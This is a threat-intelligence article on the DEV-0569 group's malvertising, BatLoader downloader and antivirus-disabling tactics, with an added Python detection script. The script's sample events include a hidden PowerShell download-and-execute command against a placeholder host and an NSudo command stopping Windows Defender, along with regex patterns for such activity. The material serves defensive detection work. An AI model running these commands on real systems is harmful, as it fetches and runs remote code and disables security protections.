
DEV-0569 Group Switches Tactics, Abuses Google Ads to Deliver Payloads

Microsoft researchers have identified a threat activity cluster that they track as DEV-0569. Since August, the group has cycled through several delivery tactics; the most recent one abuses Google Ads to deliver the BatLoader malware downloader.

What has been revealed?

According to the report, attacks by DEV-0569 are evolving continuously, as the group is improving upon its evasion tactics, post-compromise payload delivery, and ransomware facilitation.
  • From August to October, the group reached its victims through malvertising that led to downloader links posing as installers for common applications such as Microsoft Teams, Zoom, Adobe Flash Player, AnyDesk, or LogMeIn.
  • It uses the malware downloader BatLoader, which drops the next-stage payloads via PowerShell commands, including Royal ransomware and a Cobalt Strike Beacon implant.

Moreover, the group has been using the open-source tool NSudo to disable antivirus solutions on targeted machines.
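
The chain described above (a fake installer launched by the user, PowerShell fetching the next stage, NSudo used to switch off antivirus) leaves a recognizable pattern in process-creation telemetry. The following detection logic is an added example written for this page; it is not code from Microsoft's report or from the DEV-0569 toolset. The events are constructed, the URL is a placeholder, and the NSudo switches -U:T (TrustedInstaller) and -P:E (enable all privileges) are assumed from NSudo's own command-line help rather than taken from the report.

```python
import re

# Constructed sample process-creation events (not real telemetry). They model
# the chain described in the text: a fake "installer" launched from the user's
# Downloads folder, PowerShell pulling a next stage, then NSudo stopping Defender.
SAMPLE_EVENTS = [
    {"pid": 4012, "ppid": 1200,
     "image": r"C:\Users\alice\Downloads\TeamsSetup.exe",
     "cmdline": r'"C:\Users\alice\Downloads\TeamsSetup.exe"'},
    {"pid": 4100, "ppid": 4012,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''powershell.exe -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"'''},
    {"pid": 4200, "ppid": 4100,
     "image": r"C:\Users\alice\AppData\Local\Temp\NSudo.exe",
     # -U:T / -P:E are assumed NSudo switches (TrustedInstaller, all privileges).
     "cmdline": r"NSudo.exe -U:T -P:E cmd /c sc stop WinDefend"},
    {"pid": 5000, "ppid": 900,  # benign admin script: must not fire
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\inventory.ps1"},
]

# Paths an unprivileged user can write to, where dropped installers usually live.
USER_WRITABLE = re.compile(r"\\(Downloads|Temp|AppData\\Local|AppData\\Roaming|Public)\\", re.I)
# PowerShell download/execute cradles.
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|\bIEX\b|Invoke-Expression", re.I)
# Flags that hide the window or bypass policy/logging.
PS_EVASION = re.compile(r"-(?:nop|noprofile)\b|-w(?:indowstyle)?\s+hidden|-e(?:p|xecutionpolicy)\s+bypass|-enc(?:odedcommand)?\b", re.I)
# Actions against Defender/AV services or real-time protection.
AV_TAMPER = re.compile(r"WinDefend|MsMpEng|Set-MpPreference|DisableRealtimeMonitoring|sc\s+(?:stop|delete|config)|taskkill", re.I)
# Assumed NSudo switches requesting TrustedInstaller (-U:T) or SYSTEM (-U:S).
NSUDO_ELEVATE = re.compile(r"-U:[TS]\b|TrustedInstaller", re.I)


def ancestors(event, by_pid):
    """Walk the parent chain of an event (guarding against pid-reuse loops)."""
    chain, seen = [], set()
    parent = by_pid.get(event["ppid"])
    while parent and parent["pid"] not in seen:
        seen.add(parent["pid"])
        chain.append(parent)
        parent = by_pid.get(parent["ppid"])
    return chain


def nsudo_tamper(event):
    """Return a rule name if NSudo is run elevated to tamper with AV, else None."""
    # Matching on file name is brittle (the binary can be renamed); on Sysmon
    # data prefer OriginalFileName or a hash. Kept simple here for illustration.
    if not event["image"].lower().endswith("nsudo.exe"):
        return None
    cmd = event["cmdline"]
    if NSUDO_ELEVATE.search(cmd) and AV_TAMPER.search(cmd):
        return "nsudo_av_tamper"
    return None


def detect(events):
    """Return [(pid, (reason, ...))] for events matching the BatLoader-style chain."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        cmd = e["cmdline"]
        if e["image"].lower().endswith("powershell.exe") and CRADLE.search(cmd):
            reasons = ["download_cradle"]
            if PS_EVASION.search(cmd):
                reasons.append("evasion_flags")
            # A cradle whose ancestor was launched from a user-writable path is the
            # "fake installer spawns PowerShell" pattern, not an admin's script.
            if any(USER_WRITABLE.search(a["image"]) for a in ancestors(e, by_pid)):
                reasons.append("parent_in_user_writable_path")
            hits.append((e["pid"], tuple(reasons)))
        tamper = nsudo_tamper(e)
        if tamper:
            hits.append((e["pid"], (tamper,)))
    return hits


if __name__ == "__main__":
    for pid, reasons in detect(SAMPLE_EVENTS):
        print(pid, ", ".join(reasons))
```

On the constructed events this flags the PowerShell cradle (pid 4100, with all three reasons) and the elevated NSudo service stop (pid 4200), and leaves the benign inventory script alone. The parent-chain check is what separates a dropped installer from an administrator running a download cradle by hand; the NSudo rule should in practice key on the binary's hash or original file name rather than its on-disk name.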

Shift in delivery methods

DEV-0569 likely used ZLoader as its delivery method at the beginning of this year and shifted to BatLoader after ZLoader was disrupted in April.
  • In September, the group started using contact forms on public websites to deliver information-stealer payloads, posing as a national financial authority.
  • When victims replied by email, they received a message linking to a supposed installer for one of the legitimate applications mentioned above; the link instead delivered BatLoader, hosted on GitHub and OneDrive.
  • Besides installer files, the group also used Virtual Hard Disk (VHD) files that impersonated legitimate software.
  • In late October, DEV-0569 malvertising campaigns were observed using Google Ads, blending into normal web traffic to avoid detection. The group was also observed using the legitimate Traffic Distribution System (TDS) Keitaro to filter victims and selectively deliver its payloads.

Concluding note

DEV-0569 abuses legitimate services such as Google Ads, GitHub, and OneDrive, and tools such as Keitaro, to blend in with normal traffic. To defend against such attacks, organizations should define strict email policies and implement mail flow rules that restrict which IP ranges and domains are allowed to deliver mail into the organization.
Cyware Publisher